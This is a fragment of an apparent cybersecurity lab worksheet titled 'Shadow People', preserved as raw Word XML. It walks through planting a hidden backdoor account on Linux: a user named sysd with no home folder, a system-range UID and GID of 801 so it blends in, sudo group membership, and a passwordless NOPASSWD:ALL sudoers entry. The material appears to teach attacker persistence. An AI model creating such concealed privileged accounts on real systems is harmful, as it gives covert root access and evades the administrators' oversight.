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Shadow People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secret user named sysd. Make sure this user doesn't have a home folder created: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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004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root:~\  $ adduser --no-create-home sysd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 your secret user a password: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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007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root:~\ $ passwd sysd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 your secret user a system UID &lt; 1000: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root:~\ $ usermod -u 801 sysd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 your secret user the same GID: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</w:t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root:~\ $ groupmod -g 801 sysd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 your secret user full sudo access without the need for a password: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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010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root:~\ $ usermod -aG sudo sysd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011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root:~\ $ visudo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Test that sudo access works without your password:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Your bash commands here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sysd  ALL=(ALL) NOPASSWD:ALL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800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